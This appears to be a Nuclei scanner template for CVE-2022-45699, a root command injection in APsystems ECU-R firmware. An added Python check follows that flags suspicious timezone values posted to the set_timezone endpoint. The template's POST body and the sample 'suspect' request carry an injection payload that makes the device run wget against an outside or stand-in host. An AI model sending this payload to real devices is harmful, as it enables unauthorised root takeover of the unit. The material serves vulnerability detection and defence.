Vulnerability description
Command injection in the administration interface in APSystems ECU-R version 5203 allows a remote unauthenticated attacker to execute arbitrary commands as root using the timezone parameter.
id: CVE-2022-45699

info:
  name: APsystems ECU-R Firmware - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    Command injection in the administration interface in APSystems ECU-R version 5203 allows a remote unauthenticated attacker to execute arbitrary commands as root using the timezone parameter.
  reference:
    - https://github.com/0xst4n/APSystems-ECU-R-RCE-Timezone
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-45699
    cwe-id: CWE-78,CWE-94
    epss-score: 0.90725
    epss-percentile: 0.99603
    cpe: cpe:2.3:o:apsystems:ecu-r_firmware:5203:*:*:*:*:*:*:*
  metadata:
    vendor: apsystems
    product: ecu-r_firmware
  tags: cve,cve2022,rce,apsystems

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "<title>Altenergy Power Control Software"
        internal: true

  - raw:
      - |
        POST /index.php/management/set_timezone HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        timezone=;wget+{{interactsh-url}};#

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 490a004630440220663d95318910e1b021c9eb6ced49c89c83d7b1c9e3f5c7266eb40d3238d5098002200b3507e72a1de15a8107cb66c4478a1a137729f0a9ac99488f8b631b3fdbb40a:922c64590222798bb761d5b6d8e72950
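
A defensive check built from the endpoint and parameter in the template above, as an added example that is not part of the original template or the vendor's code: it classifies a captured raw HTTP request and alerts when the timezone value posted to set_timezone is not a plain zone name. The function names, the zone-name pattern and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Endpoint and parameter taken from the template above.
TARGET_PATH = "/index.php/management/set_timezone"
PARAM = "timezone"
# Assumption: a legitimate value is an IANA-style zone name such as
# "UTC", "Europe/Amsterdam" or "America/Argentina/Buenos_Aires".
ZONE_NAME = re.compile(r"[A-Za-z][A-Za-z0-9_+-]*(?:/[A-Za-z0-9_+-]+){0,2}")


def form_values(body: str, name: str) -> list[str]:
    """Return every decoded value of `name` in a urlencoded body."""
    values = []
    for pair in body.strip().split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            values.append(unquote_plus(value))
    return values


def inspect_request(raw: str) -> str:
    """Classify a captured request as 'ignore', 'ok' or 'alert'."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2 or parts[0].upper() != "POST":
        return "ignore"
    if parts[1].split("?", 1)[0].rstrip("/") != TARGET_PATH:
        return "ignore"
    # Anything that is not a bare zone name (shell metacharacters,
    # spaces, empty strings) has no business in this parameter.
    bad = [v for v in form_values(body, PARAM) if not ZONE_NAME.fullmatch(v)]
    return "alert" if bad else "ok"


# Constructed sample requests (not captured traffic).
HEADERS = ("POST /index.php/management/set_timezone HTTP/1.1\r\n"
           "Host: ecu.example\r\n"
           "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
BENIGN = HEADERS + "timezone=Europe%2FAmsterdam"
SUSPECT = HEADERS + "timezone=;wget+callback.example;#"

if __name__ == "__main__":
    for label, request in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect_request(request))
```

The same allowlist applied server-side, before the value reaches any shell, is the corresponding fix for CWE-78.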